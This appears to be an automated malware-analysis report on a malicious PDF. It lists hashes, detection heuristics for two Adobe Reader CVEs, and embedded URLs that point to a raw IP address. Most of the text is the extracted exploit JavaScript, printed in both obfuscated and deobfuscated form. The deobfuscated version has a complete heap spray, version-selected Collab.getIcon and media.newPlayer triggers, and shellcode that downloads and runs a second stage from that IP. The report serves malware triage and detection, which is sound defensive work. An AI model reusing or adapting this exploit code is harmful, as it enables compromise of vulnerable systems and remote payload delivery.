Malicious PDF — malware analysis report

Static analysis result for SHA-256 32d735bace0a8055…

MALICIOUS

PDF

13.9 KB First seen: 2012-10-18
MD5: 5d22b9ed5b4c747ead29549d5f0dcc0b SHA-1: 002f1402e4c364fe128bcdea730a3ec7ca937a88 SHA-256: 32d735bace0a805522dc3200d0cc105a8e6a792b0b29b124f2656690f56816d6
310 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://91.228.133.56/dnsftrsn/ac16ab2fff6df42a7c42b0843916a3c4/d7.php?f=g Referenced by PDF JavaScript
    • http://91.228.133.56/dnsftrsn/ac16ab2fff6df42a7c42b0843916a3c4/d8.php?f=nReferenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0076_000.js pdf-javascript-stream PDF /JS object 76 at offset 0x38A 13132 bytes
SHA-256: b6e295b722860ecdece19e11d07d02e84e2c3dd2bac9ef91c9cabe165ecf6405
Preview script
First 1,000 lines of the extracted script
a="o}el=xri2Fg3(]ban{t;y@5,Bsc'V_C.f%wh9>|Pu8 ApIN[d:0-1DE&Sm+v764)<";
w='';
w+='sl';
w+='i';
w+="c"+a[2];
j='b343tb3g';
j=j[w];
z
=new Array
(59,15,6,42,29,52,0,4,27,33,40,41,11,61,61,33,40,9,30,54,62,33,40,41,22,9,30,33,40,60,22,54,62,33,40,54,36,11,62,33,40,11,11,22,9,33,40,61,62,30,50,33,40,62,50,41,24,33,40,41,24,11,50,33,40,50,30,62,50,33,40,60,50,41,24,33,40,22,61,52,30,33,40,60,61,41,24,33,40,11,11,50,41,33,40,61,61,53,24,33,40,22,54,41,24,33,40,50,11,11,30,33,40,11,11,60,62,33,40,41,52,8,30,33,40,52,22,54,54,33,40,9,9,52,50,33,40,24,41,9,9,33,40,62,50,41,24,33,40,30,11,11,50,33,40,11,36,62,61,33,40,60,22,50,61,33,40,41,60,9,24,33,40,8,62,11,62,33,40,54,62,41,22,33,40,22,52,60,22,33,40,54,24,54,36,33,40,22,52,62,30,33,40,41,24,22,61,33,40,11,30,60,22,33,40,60,62,41,24,33,40,60,41,11,22,33,40,9,22,50,11,33,40,41,24,22,61,33,40,8,50,60,61,33,40,9,22,50,11,33,40,30,36,11,11,33,40,62,52,62,36,33,40,43,53,9,30,33,40,30,22,50,11,33,40,53,24,11,11,33,40,24,54,50,9,33,40,11,41,52,50,33,40,60,62,9,8,33,40,30,52,50,41,33,40,50,53,30,24,33,40,53,43,50,11,33,40,54,24,62,50,33,40,11,24,9,52,33,40,60,22,52,9,33,40,22,54,54,61,33,40,22,54,41,24,33,40,50,11,8,62,33,40,61,61,53,53,33,40,50,30,41,24,33,40,41,53,62,24,33,40,54,30,62,61,33,40,22,62,9,9,33,40,50,30,8,62,33,40,53,41,41,24,33,40,53,53,50,11,33,40,50,62,41,24,33,40,50,11,41,24,33,40,43,24,30,22,33,40,22,36,22,54,33,40,54,24,30,11,33,40,43,53,22,11,33,40,61,41,41,24,33,40,41,50,8,50,33,40,50,30,60,53,33,40,60,62,11,11,33,40,36,61,50,11,33,40,9,11,54,24,33,40,61,41,41,24,33,40,41,24,50,41,33,40,61,43,9,60,33,40,22,36,50,22,33,40,36,41,54,41,33,40,9,9,9,9,33,40,54,8,9,9,33,40,54,41,9,36,33,40,50,50,50,50,33,40,50,50,50,50,33,40,22,50,22,41,33,40,62,50,61,43,33,40,9,9,61,41,33,40,50,50,50,50,33,40,22,50,50,50,33,40,30,50,41,11,33,40,22,50,52,36,33,40,41,24,22,22,33,40,41,24,54,30,33,40,52,50,22,54,33,40,30,11,41,11,33,40,9,9,50,22,33,40,61,41,54,11,33,40,61,54,61,9,33,40,50,50,50,50,33,40,60,22,61,41,33,40,61,30,60,8,33,40,22,62,61,53,33,40,52,61,9,9,33,40,30,62,41,11,33,40,41,24,50,41,33,40,54,41,54,41,33,40,9,9,61,52,33,40,9,9,9,9,33,40,50,8,54,24,33,40,60,8,54,24,33,40,54,30,41,52,33,40,50,52,50,62,33,40,50,50,50,50,33,40,22,30,41,53,33,40,50,30,8,62,33,40,50,62,30,60,33,40,60,8,8,62,33,40,61,60,61,22,33,40,30,60,60,11,33,40,8,62,62,62,33,40,60,61,50,62,33,40,11,11,60,8,33,40,30,60,11,8,33,40,8,62,62,62,33,40,8,50,50,41,33,40,60,11,8,53,33,40,22,11,8,50,33,40,9,41,61,41,33,40,50,50,50,50,33,40,9,9,50,50,33,40,50,30,22,61,33,40,54,41,41,24,33,40,30,36,11,11,33,40,30,60,22,52,33,40,52,53,62,62,33,40,60,60,50,50,33,40,61,8,60,50,33,40,30,60,60,62,33,40,52,53,62,62,33,40,8,54,50,22,33,40,61,30,61,62,33,40,30,61,61,30,33,40,52,53,62,62,33,40,50,50,50,36,33,40,41,43,22,36,33,40,50,62,30,52,33,40,41,41,11,50,33,40,52,53,62,62,33,40,62,52,50,62,33,40,61,43,22,52,33,40,61,43,50,50,33,40,22,11,50,50,33,40,61,43,22,60,33,40,9,9,50,50,33,40,52,62,22,61,33,40,30,50,41,22,33,40,52,61,60,22,33,40,50,50,61,43,33,40,9,9,22,11,33,40,50,62,22,61,33,40,50,50,61,43,33,40,54,24,41,11,33,40,22,11,50,30,33,40,22,61,9,9,33,40,41,11,50,62,33,40,50,30,30,11,33,40,50,8,54,24,33,40,52,11,54,24,33,40,41,50,62,60,33,40,50,50,11,9,33,40,9,43,60,22,33,40,41,50,62,60,33,40,50,50,11,9,33,40,30,62,60,22,33,40,50,50,61,43,33,40,9,54,61,43,33,40,22,61,9,9,33,40,54,41,50,41,33,40,9,54,36,30,33,40,9,9,9,9,33,40,62,54,41,54,33,40,54,30,50,54,33,40,9,54,36,41,33,40,50,54,41,43,33,40,61,9,41,36,33,40,24,53,50,52,33,40,30,43,11,11,33,40,22,24,41,43,33,40,30,61,52,24,33,40,60,36,62,61,33,40,52,43,11,61,33,40,60,50,8,9,33,40,60,62,61,41,33,40,60,50,60,62,33,40,8,9,11,43,33,40,11,36,8,9,33,40,8,54,11,52,33,40,11,8,11,8,33,40,8,54,11,41,33,40,11,11,11,52,33,40,8,54,11,11,33,40,11,61,11,22,33,40,61,62,8,9,33,40,60,11,61,54,33,40,60,62,61,61,33,40,60,11,60,8,33,40,8,9,61,54,33,40,61,11,61,52,33,40,11,61,11,52,33,40,61,8,61,52,33,40,61,61,11,8,33,40,61,61,61,61,33,40,61,62,11,61,33,40,11,62,61,61,33,40,61,52,11,8,33,40,61,11,11,60,33,40,11,8,11,62,33,40,11,50,61,8,33,40,11,62,11,41,33,40,11,36,11,11,33,40,11,61,11,52,33,40,11,11,61,52,33,40,11,62,61,11,33,40,61,62,8,9,33,40,8,54,11,60,33,40,61,41,60,50,33,40,11,9,60,50,33,40,11,53,61,61,33,40,50,50,61,60,33,40,50,50,50,50,27,19,59,15,6,42,29,8,0,4,27,33,40,41,11,61,61,33,40,9,30,54,62,33,40,41,22,9,30,33,40,60,22,54,62,33,40,54,36,11,62,33,40,11,11,22,9,33,40,61,62,30,50,33,40,62,50,41,24,33,40,41,24,11,50,33,40,50,30,62,50,33,40,60,50,41,24,33,40,22,61,52,30,33,40,60,61,41,24,33,40,11,11,50,41,33,40,61,61,53,24,33,40,22,54,41,24,33,40,50,11,11,30,33,40,11,11,60,62,33,40,41,52,8,30,33,40,52,22,54,54,33,40,9,9,52,50,33,40,24,41,9,9,33,40,62,50,41,24,33,40,30,11,11,50,33,40,11,36,62,61,33,40,60,22,50,61,33,40,41,60,9,24,33,40,8,62,11,62,33,40,54,62,41,22,33,40,22,52,60,22,33,40,54,24,54,36,33,40,22,52,62,30,33,40,41,24,22,61,33,40,11,30,60,22,33,40,60,62,41,24,33,40,60,41,11,22,33,40,9,22,50,11,33,40,41,24,22,61,33,40,8,50,60,61,33,40,9,22,50,11,33,40,30,36,11,11,33,40,62,52,62,36,33,40,43,53,9,30,33,40,30,22,50,11,33,40,53,24,11,11,33,40,24,54,50,9,33,40,11,41,52,50,33,40,60,62,9,8,33,40,30,52,50,41,33,40,50,53,30,24,33,40,53,43,50,11,33,40,54,24,62,50,33,40,11,24,9,52,33,40,60,22,52,9,33,40,22,54,54,61,33,40,22,54,41,24,33,40,50,11,8,62,33,40,61,61,53,53,33,40,50,30,41,24,33,40,41,53,62,24,33,40,54,30,62,61,33,40,22,62,9,9,33,40,50,30,8,62,33,40,53,41,41,24,33,40,53,53,50,11,33,40,50,62,41,24,33,40,50,11,41,24,33,40,43,24,30,22,33,40,22,36,22,54,33,40,54,24,30,11,33,40,43,53,22,11,33,40,61,41,41,24,33,40,41,50,8,50,33,40,50,30,60,53,33,40,60,62,11,11,33,40,36,61,50,11,33,40,9,11,54,24,33,40,61,41,41,24,33,40,41,24,50,41,33,40,61,43,9,60,33,40,22,36,50,22,33,40,36,41,54,41,33,40,9,9,9,9,33,40,54,8,9,9,33,40,54,41,9,36,33,40,50,50,50,50,33,40,50,50,50,50,33,40,22,50,22,41,33,40,62,50,61,43,33,40,9,9,61,41,33,40,50,50,50,50,33,40,22,50,50,50,33,40,30,50,41,11,33,40,22,50,52,36,33,40,41,24,22,22,33,40,41,24,54,30,33,40,52,50,22,54,33,40,30,11,41,11,33,40,9,9,50,22,33,40,61,41,54,11,33,40,61,54,61,9,33,40,50,50,50,50,33,40,60,22,61,41,33,40,61,30,60,8,33,40,22,62,61,53,33,40,52,61,9,9,33,40,30,62,41,11,33,40,41,24,50,41,33,40,54,41,54,41,33,40,9,9,61,52,33,40,9,9,9,9,33,40,50,8,54,24,33,40,60,8,54,24,33,40,54,30,41,52,33,40,50,52,50,62,33,40,50,50,50,50,33,40,22,30,41,53,33,40,50,30,8,62,33,40,50,62,30,60,33,40,60,8,8,62,33,40,61,60,61,22,33,40,30,60,60,11,33,40,8,62,62,62,33,40,60,61,50,62,33,40,11,11,60,8,33,40,30,60,11,8,33,40,8,62,62,62,33,40,8,50,50,41,33,40,60,11,8,53,33,40,22,11,8,50,33,40,9,41,61,41,33,40,50,50,50,50,33,40,9,9,50,50,33,40,50,30,22,61,33,40,54,41,41,24,33,40,30,36,11,11,33,40,30,60,22,52,33,40,52,53,62,62,33,40,60,60,50,50,33,40,61,8,60,50,33,40,30,60,60,62,33,40,52,53,62,62,33,40,8,54,50,22,33,40,61,30,61,62,33,40,30,61,61,30,33,40,52,53,62,62,33,40,50,50,50,36,33,40,41,43,22,36,33,40,50,62,30,52,33,40,41,41,11,50,33,40,52,53,62,62,33,40,62,52,50,62,33,40,61,43,22,52,33,40,61,43,50,50,33,40,22,11,50,50,33,40,61,43,22,60,33,40,9,9,50,50,33,40,52,62,22,61,33,40,30,50,41,22,33,40,52,61,60,22,33,40,50,50,61,43,33,40,9,9,22,11,33,40,50,62,22,61,33,40,50,50,61,43,33,40,54,24,41,11,33,40,22,11,50,30,33,40,22,61,9,9,33,40,41,11,50,62,33,40,50,30,30,11,33,40,50,8,54,24,33,40,52,11,54,24,33,40,41,50,62,60,33,40,50,50,11,9,33,40,9,43,60,22,33,40,41,50,62,60,33,40,50,50,11,9,33,40,30,62,60,22,33,40,50,50,61,43,33,40,9,54,61,43,33,40,22,61,9,9,33,40,54,41,50,41,33,40,9,54,36,30,33,40,9,9,9,9,33,40,62,54,41,54,33,40,54,30,50,54,33,40,9,54,36,41,33,40,50,54,41,43,33,40,61,9,41,36,33,40,24,53,50,52,33,40,30,43,11,11,33,40,22,24,41,43,33,40,30,61,52,24,33,40,60,36,62,61,33,40,52,43,11,61,33,40,60,50,8,9,33,40,60,62,61,41,33,40,60,50,60,62,33,40,8,9,11,43,33,40,11,36,8,9,33,40,8,54,11,52,33,40,11,8,11,8,33,40,8,54,11,41,33,40,11,11,11,52,33,40,8,54,11,11,33,40,11,61,11,22,33,40,61,62,8,9,33,40,60,11,61,54,33,40,60,62,61,61,33,40,60,11,60,8,33,40,8,9,61,54,33,40,61,11,61,52,33,40,11,61,11,52,33,40,61,8,61,52,33,40,61,61,11,8,33,40,61,61,61,61,33,40,61,62,11,61,33,40,11,62,61,61,33,40,61,52,11,8,33,40,61,11,11,60,33,40,11,8,11,62,33,40,11,50,61,8,33,40,11,62,11,41,33,40,11,36,11,11,33,40,11,61,11,52,33,40,11,11,61,52,33,40,11,62,61,11,33,40,61,62,8,9,33,40,8,54,11,41,33,40,61,41,60,50,33,40,11,9,60,50,33,40,11,53,61,61,33,40,50,50,61,54,33,40,50,50,50,50,27,19,32,40,16,26,18,7,0,16,42,29,11,0,12,63,17,59,15,6,42,29,62,0,4,15,44,44,31,59,7,2,34,2,6,28,2,6,25,7,0,16,31,18,0,56,18,6,7,16,10,12,63,19,29,62,0,4,29,62,0,31,6,2,44,3,15,26,2,12,27,31,27,23,27,27,63,19,34,35,7,3,2,12,29,62,0,31,3,2,16,10,18,35,64,62,63,17,29,62,0,58,4,27,50,27,19,1,29,62,0,4,44,15,6,25,2,45,16,18,12,29,62,0,23,52,50,63,19,6,2,18,40,6,16,42,29,62,0,19,1,32,40,16,26,18,7,0,16,42,29,22,0,12,63,17,32,40,16,26,18,7,0,16,42,29,61,0,12,63,17,59,15,6,42,29,60,0,4,27,44,21,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,42,49,42,20,20,20,20,52,52,52,27,19,40,18,7,3,31,44,6,7,16,18,48,12,29,60,0,23,16,2,34,42,53,15,18,2,12,63,63,19,1,59,15,6,42,29,41,0,4,52,8,50,50,50,19,29,36,0,4,16,2,34,42,43,6,6,15,20,12,63,19,59,15,6,42,29,52,0,50,4,27,33,40,36,50,36,50,33,40,36,50,36,50,27,19,59,15,6,42,29,52,0,52,4,29,8,0,19,29,52,0,50,4,40,16,2,25,26,15,44,2,12,29,52,0,50,63,19,29,52,0,52,4,40,16,2,25,26,15,44,2,12,29,52,0,52,63,19,34,35,7,3,2,12,29,52,0,50,31,3,2,16,10,18,35,64,4,50,5,41,50,50,50,63,17,29,52,0,50,58,4,29,52,0,50,19,1,29,52,0,50,4,29,52,0,50,31,25,40,14,25,18,6,12,50,23,50,5,41,50,50,50,51,29,52,0,52,31,3,2,16,10,18,35,63,19,42,32,0,6,12,29,52,0,8,4,50,19,29,52,0,8,64,29,41,0,19,29,52,0,8,58,58,63,17,29,36,0,47,29,52,0,8,13,4,29,52,0,50,58,29,52,0,52,19,1,7,32,12,29,41,0,63,17,29,61,0,12,63,19,29,61,0,12,63,19,18,6,20,17,18,35,7,25,31,57,2,48,7,15,31,16,2,34,39,3,15,20,2,6,12,16,40,3,3,63,19,1,26,15,18,26,35,12,2,63,17,1,29,61,0,12,63,19,1,1,32,40,16,26,18,7,0,16,42,29,52,0,11,12,63,17,59,15,6,42,29,52,0,62,4,40,16,2,25,26,15,44,2,12,29,52,0,63,19,29,52,0,22,4,40,16,2,25,26,15,44,2,12,27,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,27,63,58,29,52,0,62,19,29,52,0,61,4,40,16,2,25,26,15,44,2,12,27,33,40,36,50,36,50,33,40,36,50,36,50,27,63,19,29,52,0,60,4,52,50,19,29,52,0,41,4,29,52,0,60,58,29,52,0,22,31,3,2,16,10,18,35,19,34,35,7,3,2,12,29,52,0,61,31,3,2,16,10,18,35,64,29,52,0,41,63,29,52,0,61,58,4,29,52,0,61,19,29,52,0,36,4,29,52,0,61,31,25,40,14,25,18,6,7,16,10,12,50,23,29,52,0,41,63,19,29,8,0,8,4,29,52,0,61,31,25,40,14,25,18,6,7,16,10,12,50,23,29,52,0,61,31,3,2,16,10,18,35,51,29,52,0,41,63,19,34,35,7,3,2,12,29,8,0,8,31,3,2,16,10,18,35,58,29,52,0,41,64,50,5,62,50,50,50,50,63,29,8,0,8,4,29,8,0,8,58,29,8,0,8,58,29,52,0,36,19,29,8,0,50,4,16,2,34,42,43,6,6,15,20,12,63,19,32,0,6,12,29,8,0,52,4,50,19,29,8,0,52,64,52,41,50,19,29,8,0,52,58,58,63,29,8,0,50,47,29,8,0,52,13,4,29,8,0,8,58,29,52,0,22,19,59,15,6,42,29,8,0,11,4,62,50,52,8,19,59,15,6,42,29,8,0,62,4,43,6,6,15,20,12,29,8,0,11,63,19,32,0,6,12,29,8,0,52,4,50,19,29,8,0,52,64,29,8,0,11,19,29,8,0,52,58,58,63,17,29,8,0,62,47,29,8,0,52,13,4,40,16,2,25,26,15,44,2,12,27,33,50,15,33,50,15,33,50,15,33,50,15,27,63,19,1,30,0,3,3,15,14,31,10,2,18,45,26,0,16,12,29,8,0,62,58,27,29,46,31,14,40,16,48,3,2,27,63,19,1,59,15,6,42,29,62,0,4,29,11,0,12,63,19,7,32,12,12,12,29,62,0,37,41,36,22,50,63,55,55,12,29,62,0,64,36,50,22,50,63,63,38,38,12,12,29,62,0,37,4,41,50,50,50,63,55,55,12,29,62,0,64,4,41,52,50,8,63,63,63,17,29,52,0,11,12,63,19,1,2,3,25,2,42,7,32,12,12,29,62,0,37,4,36,52,50,50,63,38,38,12,29,62,0,64,4,36,8,50,50,63,38,38,12,29,62,0,37,4,41,52,50,11,63,38,38,12,29,62,0,64,4,41,52,50,60,63,63,17,29,22,0,12,63,19,1);
s='';
b
=
'al';
b2
=a[2]
+
a[59]+b;for
(i=0;i<z.length;i++)
{s+=a[z[i]]}
e=(j());
e=e[b2];
e(s);
generic_stage_recovery_000.js deobfuscated-js generic stage recovery alphabet-index-array from JavaScript object 76 at offset 0x38A 4469 bytes
SHA-256: f611ef698f84f58826dbea01c263fd3f36f5843761081a4ec2797a40fadbbca2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var _1o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u736E%u7466%u7372%u2F6E%u6361%u3631%u6261%u6632%u6666%u6436%u3466%u6132%u6337%u3234%u3062%u3438%u3933%u3631%u3361%u3463%u642F%u2E37%u6870%u3F70%u3D66%u0067%u0000';var _2o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u736E%u7466%u7372%u2F6E%u6361%u3631%u6261%u6632%u6666%u6436%u3466%u6132%u6337%u3234%u3062%u3438%u3933%u3631%u3361%u3463%u642F%u2E38%u6870%u3F70%u3D66%u006E%u0000';function _3o(){var _4o=app.viewerVersion.toString();_4o=_4o.replace('.','');while(_4o.length<4){_4o+='0';}_4o=parseInt(_4o,10);return _4o;}function _5o(){function _6o(){var _7o='p@111111111111111111111111 : yyyy111';util.printd(_7o,new Date());}var _8o=12000;_9o=new Array();var _1o0='%u9090%u9090';var _1o1=_2o;_1o0=unescape(_1o0);_1o1=unescape(_1o1);while(_1o0.length<=0x8000){_1o0+=_1o0;}_1o0=_1o0.substr(0,0x8000-_1o1.length); for(_1o2=0;_1o2<_8o;_1o2++){_9o[_1o2]=_1o0+_1o1;}if(_8o){_6o();_6o();try{this.media.newPlayer(null);}catch(e){}_6o();}}function _1o3(){var _1o4=unescape(_1o);_1o5=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090')+_1o4;_1o6=unescape('%u9090%u9090');_1o7=10;_1o8=_1o7+_1o5.length;while(_1o6.length<_1o8)_1o6+=_1o6;_1o9=_1o6.substring(0,_1o8);_2o2=_1o6.substring(0,_1o6.length-_1o8);while(_2o2.length+_1o8<0x40000)_2o2=_2o2+_2o2+_1o9;_2o0=new Array();for(_2o1=0;_2o1<180;_2o1++)_2o0[_2o1]=_2o2+_1o5;var _2o3=4012;var _2o4=Array(_2o3);for(_2o1=0;_2o1<_2o3;_2o1++){_2o4[_2o1]=unescape('%0a%0a%0a%0a');}Collab.getIcon(_2o4+'_N.bundle');}var _4o=_3o();if(((_4o>8950)&&(_4o<9050))||((_4o>=8000)&&(_4o<=8102))){_1o3();}else if((_4o>=9100)||(_4o<=9200)||(_4o>=8103)||(_4o<=8107)){_5o();}
generic_stage_recovery_001.js deobfuscated-js generic stage recovery percent-decode from JavaScript object 76 at offset 0x38A 4461 bytes
SHA-256: b3b358b9c0dfecc3651dc21c0ede49b5a7ee0c81edb733754e0efc941e56fe80
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
